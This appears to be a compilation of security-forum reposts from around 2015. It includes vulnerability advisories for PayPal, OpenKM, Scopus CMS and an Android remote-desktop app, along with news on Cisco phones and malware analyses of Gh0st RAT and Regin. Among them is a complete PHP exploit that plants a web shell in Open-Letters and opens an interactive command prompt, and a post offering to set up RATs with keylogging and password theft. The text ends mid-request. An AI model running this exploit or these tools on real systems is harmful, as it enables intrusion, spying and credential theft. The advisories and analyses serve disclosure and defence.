was. If the client wishes to debug a software, which requires various pieces to work together, we can easily use remote debugging capabilities to remotely identify the problem they have been facing. This gets more and more important when debugging SCADA applications, which require certain kinds of hardware that we normally don’t have access to in our every day lives, like a nuclear plant, an air conditioning, etc. In such circumstances, we would have to fly to the client’s location in order to identify the problem at hand, but by using remote debugging capabilities we can do it from our own office from an entirely different country, which reduces costs considerably. We should all invest the time to learn and obtain debugging knowledge, which will save us time and money when trying to determine the cause of the problem. It is only by practicing that we become better and better at what we do and it’s the same with debugging: keep practicing and enjoy using your newly obtained knowledge. Source
-
Document Title: =============== PayPal Inc Bug Bounty #114 - JDWP Remote Code Execution Vulnerability References (Source): ==================== [url]http://www.vulnerability-lab.com/get_content.php?id=1474[/url] Video: [url]http://www.vulnerability-lab.com/get_content.php?id=1474[/url] Vulnerability Magazine: [url=http://magazine.vulnerability-db.com/?q=articles/2015/04/28/paypal-inc-bug-bounty-jdwp-remote-code-execution-vulnerability]PayPal Inc Bug Bounty - JDWP Remote Code Execution Vulnerability | VULNERABILITY MAGAZINE - Bug Bounties, Acknoweldgements & Security Research[/url] Release Date: ============= 2015-04-28 Vulnerability Laboratory ID (VL-ID): ==================================== 1474 Common Vulnerability Scoring System: ==================================== 9.3 Product & Service Introduction: =============================== PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. (Copy of the Homepage: [url=http://www.paypal.com]Send Money, Pay Online or Set Up a Merchant Account - PayPal[/url]) [[url=http://en.wikipedia.org/wiki/PayPal]]Bad title - Wikipedia, the free encyclopedia[/url] Abstract Advisory Information: ============================== An independent Vulnerability Laboratory Researcher discovered a remote code execution vulnerability in the official PayPal Inc Marketing online-service web-application. Vulnerability Disclosure Timeline: ================================== 2015-04-05: Researcher Notification & Coordination (Milan A Solanki - Safehacking4mas) 2015-04-06: Vendor Notification (PayPal Inc - Security & Bug Bounty Team) 2015-04-07: Vendor Response/Feedback (PayPal Inc - Security & Bug Bounty Team) 2015-04-09: Vendor Fix/Patch (PayPal Inc - Developer Team) 2015-04-28: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== PayPal Inc Product: Marketing Application & Service (HK) 2015 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== Critical Technical Details & Description: ================================ A remote code execution vulnerability has been discovered in the JDWP protocol of the PayPal Inc Marketing online service web-server. The vulnerability allows remote attackers to execute system specific code against a target system to compromise the webserver. The Java Debug Wire Protocol (JDWP) is the protocol used for communication between a debugger and the Java virtual machine (VM) which it debugs (hereafter called the target VM). JDWP is one layer within the Java Platform Debugger Architecture (JPDA). JDWP does not use any authentication and could be abused by an attacker to execute arbitrary code on the affected server. The tool that i used to disclose is the jdwp-shellifier. I scanned the marketing site and it had opened port 8000 (pre-auth) than i just executed after accepted connection my commands and finally disclosed a remote code execution issue. Vulnerable Protocol(s): [+] JDWP Port(s): [+] 8000 Proof of Concept (PoC): ======================= The remote code execution web vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the security vulnerability ... 1. Scan the site with the jdwp-shellifier tool ([url]https://github.com/IOActive/jdwp-shellifier[/url]) 2. Open port 8000 and connect to the service without auth 3. Execute own server-side commands as root user 4. Successful reproduce of the vulnerability! Note: Please watch the poc demo video! Solution - Fix & Patch: ======================= 2015-04-09: Vendor Fix/Patch (PayPal Inc - Developer Team) Security Risk: ============== The security risk of the remote code execution vulnerability in the jdwp protocol is estimated as critical. (CVSS 9.3) Credits & Authors: ================== Milan A Solanki - (milans812@gmail.com) [[url]www.safehacking4mas.blogspot.in][/url] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: [url]www.vulnerability-lab.com[/url] - [url]www.vuln-lab.com[/url] - [url]www.evolution-sec.com[/url] Contact: [email]admin@vulnerability-lab.com[/email] - [email]research@vulnerability-lab.com[/email] - [email]admin@evolution-sec.com[/email] Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or [email]research@vulnerability-lab.com[/email]) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: [url]www.vulnerability-lab.com[/url] CONTACT: [email]research@vulnerability-lab.com[/email] PGP KEY: [url]http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt[/url] Source: http://dl.packetstormsecurity.net/1504-exploits/VL-1474.txt
-
Microsoft offers the Remote Desktop Protocol (RDP) in Windows to allow remote desktop connections, and while most versions of Windows include a RDP client, only the Professional, Ultimate and Server editions offer the RDP server to accept incoming connections. Unlike server editions of Windows, Microsoft limits the client editions of Windows to one concurrent user, whether remote or local. So if a remote desktop connection is made, no one physically at the PC can use it or even see the desktop without first kicking off the remote user. Today i am going to show you How to Enable Concurrent Remote Desktop Sessions in Windows server 2012 r2 Files description: RDPWInst.exe RDP Wrapper Library installer/uninstaller RDPCheck.exe Local RDP Checker (you can check the RDP is working) RDPConf.exe RDP Wrapper Configuration install.bat Quick install batch file uninstall.bat Quick uninstall batch file https://github.com/binarymaster/rdpwrap/releases
-
<?php /* OutPut: #[+] Author: TUNISIAN CYBER #[+] Script coded BY: Egidio Romano aka EgiX #[+] Title: Open-Letters Remote PHP Code Injection Vulnerability #[+] Date: 19-04-2015 #[+] Vendor: http://www.open-letters.de/ #[+] Type: WebAPP #[+] Tested on: KaliLinux (Debian) #[+] CVE: #[+] Twitter: @TCYB3R #[+] Egix's Contact: n0b0d13s[at]gmail[dot]com #[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png OL-shell> */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die( "\n[-] No response from {$host}:80\n"); fwrite($sock, $packet); return stream_get_contents($sock); } print "#[+] Author: TUNISIAN CYBER\n"; print "#[+] Script coded BY: Egidio Romano aka EgiX\n"; print "#[+] Title: Open-Letters Remote PHP Code Injection Vulnerability\n"; print "#[+] Date: 19-04-2015\n"; print "#[+] Vendor: http://www.open-letters.de/\n"; print "#[+] Type: WebAPP\n"; print "#[+] Tested on: KaliLinux (Debian)\n"; print "#[+] CVE:\n"; print "#[+] Twitter: @TCYB3R\n"; print "#[+] Egix's Contact: n0b0d13s[at]gmail[dot]com\n"; print "#[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /zenphoto/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $exploit = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>"; $packet = "POST {$path}external_scripts/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($exploit)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$exploit}"; http_send($host, $packet); $packet = "GET {$path}external_scripts/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\nOL-shell> "; if (($cmd = trim(fgets(STDIN))) == "exit") break; preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?> Source: http://packetstorm.wowhacker.com/1504-exploits/openletters-inject.txt
-
Some of the IP phones designed by Cisco for small businesses are plagued by a vulnerability that allows a remote attacker to eavesdrop on conversations and make phone calls from affected devices, the company revealed last week. The unauthenticated remote dial vulnerability (CVE-2015-0670) affects version 7.5.5 and possibly later versions of Cisco Small Business SPA300 and SPA500 series IP phones.Cisco IP phones According to an advisory published by Cisco, the flaw is caused by improper authentication settings in the affected software’s default configuration. A remote, unauthenticated attacker can exploit the weakness by sending a maliciously crafted XML request to the targeted IP phone. Malicious actors could obtain sensitive information by listening in on audio streams from the device. They can also leverage the bug to make phone calls remotely from a vulnerable phone. “A successful exploit could be used to conduct further attacks,” Cisco said. “To exploit this vulnerability, an attacker may need access to trusted, internal networks behind a firewall to send crafted XML requests to the targeted device. This access requirement may reduce the likelihood of a successful exploit,” the company noted in its advisory. Cisco has confirmed the security hole, but updates that address this issue are not yet available. The company believes it’s unlikely for this medium severity vulnerability to be exploited. Until security updates become available, administrators are advised to enable XML execution authentication from the device’s settings menu, and limit network access to trusted users. The security hole was discovered by Chris Watts of Tech Analysis. In July 2014, the researcher reported two other flaws impacting Cisco SPA300 and SPA500 series IP phones: a cross-site scripting (XSS) vulnerability (CVE-2014-3313), and a vulnerability that can be exploited by a local attacker to execute arbitrary commands (CVE-2014-3312). At around the same time, Watts also identified a remote code execution flaw in Cisco modems. Earlier this month, Cisco announced the availability of security updates that fix vulnerabilities in Cisco Intrusion Prevention System (IPS), TelePresence Video Communication Server (VCS), Expressway, and TelePresence Conductor. Sursa
-
# Exploit Title: OpenKM Platform Remote Reflected Cross Site Scripting # Google Dork: N/A # Date: 18-11-2014 # Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh) # Vendor Homepage: http://www.openkm.com/en <http://s.bl-1.com/h/mQ2bNXq?url=http://www.openkm.com/en>/ # Software Link: http://www.openkm.com/en/download-english.html <http://s.bl-1.com/h/mQ2bTws?url=http://www.openkm.com/en/download-english.html> # Version: All versions < 6.4.19 (built 23338) # Tested on: All OS # CVE : 2014-9017 -About OpenKM OpenKM is a Free/Libre document management system that provides a web interface for managing arbitrary files. OpenKM includes a content repository, Lucene indexing, and jBPM workflow. The OpenKM system was developed using Java technology. In 2005 two developers involved in open source technologies and expertise with some commercial document management solutions (Sharepoint, Documentum, Hummingbird, among others) like Excalibur search engine or Kofax OCR engine decided to start an open source project based on high level technologies to build a document management system that they decided to call OpenKM. "-Wikipedia" -Reference: http://en.wikipedia.org/wiki/OpenKM <http://s.bl-1.com/h/mQ2bYKv?url=http://en.wikipedia.org/wiki/OpenKM> -Vulnerability: Remote Reflected/Stored Cross Site Scripting with no remote interaction -Severity: Very Critical -Vulnerable Parameter(s)/Input(s): Tasks -Info: https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29 <http://s.bl-1.com/h/mQ2cfkx?url=https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29> -Impact: Remote Admin or Users Full Account Takeover with no interaction. -Attack Scenario: 1. User#1 "Attacker" : Creates a task with a vulnerable name and assign it to another User/Admin "Targeted Victim". 2. User#2 "Victim" : Got Exploited with the vulnerable Task made by the Attacker "User#1" since the Task notification will automatically appears to the assigned user side "Victim" also the notification popup displays the vulnerable task name and the victim will be exploited with no interactions. -PS: This is the most critical attack you will see on OpenKM platform because it will work remotely against users even with the same scenario described in the report you can steal/execute a JS in the Administrator's session. -PoC Video: http://youtu.be/3jBQFAAq23k Thanks -- *Best Regards**,**,* *Mohamed Abdelbaset Elnoby*Guru Programmer, Information Security Evangelist & Bug Bounty Hunter. LinkedIn <http://s.bl-1.com/h/mQ2ck6z?url=https://www.linkedin.com/in/symbiansymoh>Curriculum Vitae <http://s.bl-1.com/h/mQ2coW1?url=http://goo.gl/cNrVpL> <http://s.bl-1.com/h/mQ2ctv3?url=https://www.linkedin.com/in/symbiansymoh> Facebook <http://s.bl-1.com/h/mQ2cyJ5?url=https://fb.com/symbiansymoh>Twitter <http://s.bl-1.com/h/mQ2c3j7?url=https://twitter.com/symbiansymoh> Source
-
Document Title: =============== Data Source: Scopus CMS - SQL Injection Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1436 Release Date: ============= 2015-02-25 Vulnerability Laboratory ID (VL-ID): ==================================== 1436 Common Vulnerability Scoring System: ==================================== 8.9 Abstract Advisory Information: ============================== An independent security team of the vulnerability laboratory discovered a critical sql injection web vulnerability in the official Data Source Scopus Content Management System. Vulnerability Disclosure Timeline: ================================== 2015-02-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Critical Technical Details & Description: ================================ A remote sql injection web vulnerability has been discovered in the official Data Source Scopus Content Management System. The vulnerability allows remote attacker to inject own sql commands to compromise the affected database management system. The vulnerability is located in the `w` value of the `countrysearch.php` file. Remote attackers are able to compromise the application & dbms by manipulation of the `w` value in the `countrysearch.php` file. The issue is a classic order by injection. The request method to inject own commands is GET and the issue is located on the applicaiton-side of the service. The security risk of the sql injection vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.9. Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the remote sql injection results in dbms, web-server and web-application compromise. Request Method(s): [+] GET Vulnerable File(s): [+] countrysearch.php Vulnerable Parameter(s): [+] w Proof of Concept (PoC): ======================= The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: Example http://[localhost]/[PATH]/[FILE].php?w=-[SQL INJECCTION VULNERABILITY]'-- PoC: Demonstration http://www.server.com/countrysearch.php?w=world%27-[SQL INJECCTION VULNERABILITY]'-- Dork(s): inurl:".php?w=" Solution - Fix & Patch: ======================= The vulnerability can be patched by usage of the preapred statement in connection with a secure encode/parse of the w value in the countrysearch.php file. Restrict the w value input and filter by disallowing input of special chars or negative values. Disable php script error(0);! Security Risk: ============== The security risk of the remote sql injection web vulnerability in the countrysearch.php file is estimated as critical. Credits & Authors: ================== [GuardIran Security Team] P0!s0nC0d3 - (http://www.guardiran.org) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
-
In this article series, we will learn about one of the most predominant malware, named Gh0st RAT, whose source code is dated back to 2001 but it is still relevant today. In this article series, we will learn what exactly is Gh0st RAT, all its variants, how it works, its characteristics, etc. What is Gh0st RAT? Gh0st RAT (Remote Access Terminal) is a trojan “Remote Access Tool” used on Windows platforms, and has been used to hack into some of the most sensitive computer networks on Earth. Gh0st RAT capabilities I think that before I delve into more technical details of Gh0st RAT, let us take a brief look at the capabilities or reach of Gh0st RAT. Below is a list of Gh0st RAT capabilities. Gh0st RAT can: Take full control of the remote screen on the infected bot. Provide real time as well as offline keystroke logging. Provide live feed of webcam, microphone of infected host. Download remote binaries on the infected remote host. Take control of remote shutdown and reboot of host. Disable infected computer remote pointer and keyboard input. Enter into shell of remote infected host with full control. Provide a list of all the active processes. Clear all existing SSDT of all existing hooks. Gh0st RAT Components This section will throw light on both at user and kernel level binaries of the Gh0st RAT toolset. Gh0st RAT has two main components: client and server. Controller Application: This is known as client, which is typically a Windows application that is used to track and manage Gh0st servers on remote compromised hosts. The two main functions this module serves is the management and control of Gh0st servers and the ability to create customized server install programs. Windows DLL (user level binary): The DLL is named SVCHOST.DLL. It is the Windows DLL that gets installed on a compromised host as a Windows service. This service is the server component of the Gh0st toolkit. It checks in to the Gh0st client on startup and awaits instructions. The setup and installation of this DLL as a service is done by the install program (Dropper) SERVER.EXE which we will discuss in a short while. INSTALL.EXE Dropper application is used to install SVCHOST.DLL. This is a stand-alone Windows application that contains all required code to prepare a compromised host for the installation of the Gh0st RAT server service and the launching of that service. Kernel Level Binary: This is present in the toolset with the .SYS filename RESSDT.SYS. This is a very small device driver that performs a single task: resetting the Windows System Service Dispatch Table (SSDT). This is the only kernel level binary in the toolset. It runs at system startup on the compromised host and removes all hooks in the SSDT. Install Program: This is commonly called “the dropper.” It contains the two above described binaries and performs all of the work necessary to install the Gh0st server on a host and startup the Gh0st service. Gh0st RAT Variants Since Gh0st Rat source code is available for everyone, Gh0st Rat has many versions available, as people have generally used and even modified the code to fit their purpose. Gh0st, because of its number of variants and encrypted capabilities, is hard to recognize. Most antivirus detections today are automatically generated, resulting in names thought out by machines. Quick, but containing information only machines find interesting. The most stable indicator of being faced with a Gh0stRat is its network communication. It is well documented and quite distinctive, as it always begins with a “magic word” which in its default configuration is “Gh0st” – thus Gh0st Rat. As one can imagine, the detection of the “Gh0st” keyword in the network stream is pretty easy, as tools like Network Intrusion Prevention System (NIPS) or even Wireshark magic words are easily available in the fixed length of 5 bytes. So the below key words are from the investigations guide that contains all the magic words from a Gh0st Network stream: “7hero, Adobe, B1X6Z, BEiLa, BeiJi, ByShe, FKJP3, FLYNN, FWAPR, FWKJG,GWRAT, Gh0st, GOLDt, HEART, HTTPS, HXWAN, Heart, IM007, ITore, KOBBX, KrisR, LUCKK, LURK0, LYRAT, Level, Lover, Lyyyy, MYFYB, MoZhe, MyRat, OXXMM, PCRat, QWPOT, Spidern, Tyjhu, URATU, W0LFKO, Wangz, Winds, World, X6RAT, XDAPR, Xjjhj, ag0ft, attac, cb1st, https, whmhl, xhjyk, 00000, ABCDE, apach, Assas, Blues, chevr, CHINA, cyl22, DrAgOn EXXMM,Eyes1, Gi0st, GM110, Hello, httpx, kaGni, light, LkxCq, lvxYT, Naver, NIGHT, NoNul, Origi, QQ_124971919, Snown, SocKt, Super, Sw@rd, v2010, VGTLS, wcker, Wh0vt, wings, X6M9K, xqwf7, YANGZ” The above is not an exhaustive list, and even magic keywords like “Spidern” and “W0LFKO” come with non-standard length of 5 bytes. Other irregular magic keywords like “DrAgOn” and “QQ_124971919? do not even compress their network traffic like most other Gh0st do. In the next article of this series, we will learn about Gh0st network connections, why it is difficult to control this type of attack, and what are the possible solutions for its control that can be put in place. References http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf http://www.mcafee.com/in/resources/white-papers/foundstone/wp-know-your-digital-enemy.pdf Source
-
AntiBruteRDP is a simple tool to block bruteforce attempts on your Windows Servers running RDP. Most people will say that, why have it running in the first place? Well, there are times that you will need to have Remote Desktop service available. Tested on Windows Server 2003, Windows Server 2008, and Windows 8, it works flawlessly to block the bruteforce attempts. Please take note that auditing of failed logons are enabled on windows servers by default. If you are running client version eg. Windows 7 or Windows 8, you need to change the Audit Policy for logon attempts using Group Policy Editor (gpedit.msc). For more information, you can refer to technet here Audit logon events: Security Configuration Editor; Security Services It works by monitoring failed attempts by remote addresses and block the attempts. You can configure the settings using the AntiBruteRDP Front End. Download Zippyshare.com
- 1 reply
-
- antibruterdp
- attempts
-
(and 3 more)
Tagged with:
-
FULL RAT SETUP & SUPPORT 24/7 Do you want to have your own working rat but have no idea where to start? Do you need someone to setup everything for you? Do you need someone to teach you all you need to know? Do you need someone to an swell all your questions on RATs? I am a very experienced user in RATs and I am offering members of RST a Professional service to make sure you will have a working RAT in no time for almost no cost ( Not charging precisely but i welcome gifts and appreciations) General Functions ----------------------- – Access and Administrate Computers from Anywhere – Remote Customer Support – Telecommuting – Remote Access and Communication – Remote File Management – Remote System Activity Management – Password recovery tool (Chrome, Safari, IE, FF, Filezilla, Windows Live Messenger, No-IP, IDM and many more – Keylogger – Remote Shell (Command Interpreter) – Web Downloader (HTTP) – Screen Viewer – Bandwidth Limiter – Proxy Tunneling – Reverse Socks 4/5 Proxy Server – Local Applications Proxifier – Data Transferring List Of Rats --------------------- 1.Casa RAT 2.Back Orifice 3.Bandook RAT 4.Dark Comet Rat 5.Cerberus 6.Cybergate 7.Blackshades 8.Poison Ivy 10.Syndrome RAT 11.Team Viewer 12.Y3k RAT 13.Snoopy 15.5p00f3r.N$ RAT 16.NetBus 17.SpyNet 18.P. Storrie RAT 19.Turkojan Gold 20.Bifrost 21.Lost Door 22.Beast 23.Shark 24.Sub7 25.Pain RAT 26.xHacker Pro RAT 27.Seed RAT 28.Optix Pro RAT 29.Dark Moon 30.NetDevil 31.Deeper RAT 32.MiniMo RAT Contact: Send me a PM or email/chat me up on Yahoo IM: ratsetup247@yahoo.com Jabber : ratsetup247@exploit.im
-
The Regin malware platform used to steal secrets from government agencies, banks and GSM network operators caught the attention of security experts who called it one of the most advanced attack platforms that has been studied, surpassing Flame, Duqu, even Stuxnet. Researchers at Kaspersky Lab said Regin could be tuned to attack large organizations or even individuals, pointing out that noted cryptographer Jean Jacques Quisquater was one of its first public victims. Today, details about a pair of Regin modules were released by Kaspersky’s Global Research and Analysis Team, one module used for lateral movement, while the other establishes a backdoor in order to move data off compromised machines. The researchers, Costin Raiu and Igor Soumenkov, concede that the modules, named Hopscotch and Legspin, have likely been put out of commission by those responsible for Regin and replaced by new modules. Attribution, meanwhile, remains another mystery to Regin, though some were quick to pin either the U.S. National Security Agency, or the U.K.’s GCHQ as the perpetrators. Regin was revealed in November by Kaspersky Lab, which said it has been detected on Windows computers belonging to 27 organizations in 14 countries, most of those in Asia and the Middle East. The GSM (Global System for Mobile Communication) characteristic to Regin is a relatively unique feature to APT-style attacks, and particularly concerning given the lax security used in mobile communication protocols. The attackers were able to steal credentials from an internal GSM Base Station Controller belonging to a large telecom operator that gave them access to GSM cells in that particular network, Kaspersky Lab said. Base Station Controllers manage calls as they move along a mobile network, allocating resources and mobile data transfers. With this kind of access, the attackers knew information about calls processed by particular cells, and were able to redirect calls, activate other cells and steal data. “At the present time, the attackers behind Regin are the only ones known to have been capable of doing such operations,” Raiu said at the time. Today’s report provides an in depth analysis of two of four modules belonging to Regin (hashes, compile dates, file type and size are listed on the Securelist blog). “Despite the overall sophistication (and sometimes even over-engineering) of the Regin platform, these tools are simple, straightforward and provide interactive console interfaces for Regin operators,” the researchers wrote. “What makes them interesting is the fact they were developed many years ago and could even have been created before the Regin platform itself.” Hopscotch, for example, is a standalone tool used by the attackers for lateral movement. It relies on stolen credentials to authenticate itself on remote computers, and contains no exploits, Raiu and Soumenkov said. “The module receives the name of the target machine and an optional remote file name from the standard input (operator),” Raiu and Soumenkov wrote. The attackers can choose from several options at the time of execution and the tool provides human-readable responses and suggestions for possible input.” The module creates a new service to launch a payload extracted from a remote server using a two-way encrypted channel, one that forwards input from the operator to the payload, the other writes data from payload to the standard output. The executable injects itself into a new process for persistence and the remote operator can interact with the module. “Once completed, the tool deletes the remote file and closes the authenticated sessions, effectively removing all the traces of the operation,” Raiu and Soumenkov wrote. Legspin is another standalone module; this one is a command line utility for computer administration, and operates as a backdoor. “It is worth noting that the program has full console support and features colored output when run locally,” Raiu and Soumenkov wrote. “It can even distinguish between consoles that support Windows Console API and TTY-compatible terminals that accept escape codes for coloring.” There are clues within the module that hint it was developed around 2002-2003; it also uses legacy API functions such as NetBIOS, which was deprecated from Windows with the launch of Vista. This module gives the remote attacker an interactive command prompt, and a long list of commands at their disposal, including the ability to retrieve and upload files, connect to a remote share, retrieve server configuration data, create processes, much more. “It’s worth pointing that not all Regin deployments contain the Legspin module; in most cases, the attackers manage their victims through other Regin platform functions,” the researchers wrote. “This means that Legspin could have been used independently from the Regin platform, as a simple backdoor together with an input/output wrapper.” Source
-
Document Title: =============== Remote Web Desktop Full 5.9.5 - Multiple Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1409 Release Date: ============= 2015-01-19 Vulnerability Laboratory ID (VL-ID): ==================================== 1409 Common Vulnerability Scoring System: ==================================== 2.4 Product & Service Introduction: =============================== Remote Web Desktop enable you remotely manage & control your Android device from the computer web browser over wireless connection. (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=net.xdevelop.rmp ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered multiple web vulnerabilities in the Remote Web Desktop Full v5.9.5 Android application. Vulnerability Disclosure Timeline: ================================== 2015-01-19: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== SmartDog Studio HK Product: Remote Web Desktop Full 5.9.5 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple cross site request forgery and cross site scripting vulnerabilities has been discovered in the Remote Web Desktop Full 5.9.5 Android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and cross site scripting attacks. 1.1 The cross site scripting vulnerabilities are located in `to` value of the `sendSMS.json` file in the send sms function. The attackers needs to `Create new a contact` or `Create a contact group` with a malicious payload as name to inject. The execution occurs after the refresh inside of the main message module. Request Method(s): [+] [GET] Vulnerable Parameter(s): [+] to 1.2 The cross site request forgery vulnerabilities are located in the `makeCall.json`,`sendSMS.json`,`addTextFile.json`, `deleteFile.json` files. Remote attackers are able prepare special crafted URLs that executes client-side requests to execute application functions (delete,add, call, send). Request Method(s): [+] [GET] Vulnerable Parameter(s): [+] makeCall.json [+] sendSMS.json [+] addTextFile.json [+] deleteFile.json Proof of Concept (PoC): ======================= 1.1 The cross site request forgery vulnerability can be exploited by remote attackers without privileged application user account and with medium or high user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Call Phone Number <img src="http://localhost:8999/makeCall.json?phoneNo=11111111111" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /makeCall.json?phoneNo=11111111111 HTTP/1.1 Host: 192.168.1.3:8999 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 